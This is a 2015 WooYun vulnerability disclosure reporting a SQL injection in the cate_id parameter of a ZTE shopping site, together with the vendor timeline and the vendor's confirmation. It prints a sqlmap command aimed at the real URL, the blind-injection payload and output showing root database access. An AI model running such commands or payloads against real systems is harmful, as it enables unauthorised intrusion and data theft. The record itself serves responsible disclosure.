当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092153

漏洞标题:中兴某商场root权限注入

相关厂商:中兴通讯股份有限公司

漏洞作者: 路人甲

提交时间:2015-01-16 10:25

修复时间:2015-03-02 10:26

公开时间:2015-03-02 10:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-16: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-03-02: 细节向公众公开

简要描述:

SQL注入

详细说明:

http://ehome.zte.com.cn//index.php?app=search&cate_id=505&page=1
参数cate_id
C:\Python27>python sqlmap/sqlmap.py -u "http://ehome.zte.com.cn//index.php?app=s
earch&cate_id=505&page=1" --current-user
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20141107}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 23:17:53
[23:17:53] [INFO] resuming back-end DBMS 'mysql'
[23:17:53] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: cate_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: app=search&cate_id=505 AND 3566=3566&page=1
---
[23:17:54] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.3.27
back-end DBMS: MySQL 5
[23:17:54] [INFO] fetching current user
[23:17:54] [INFO] resumed: root@WINDOWS-KVDZHQZ
current user: 'root@WINDOWS-KVDZHQZ'
[23:17:54] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\ehome.zte.com.cn'
[*] shutting down at 23:17:54

注入.png


数据库.png


漏洞证明:

注入.png


数据库.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-01-16 16:51

厂商回复:

感谢~

最新状态:

暂无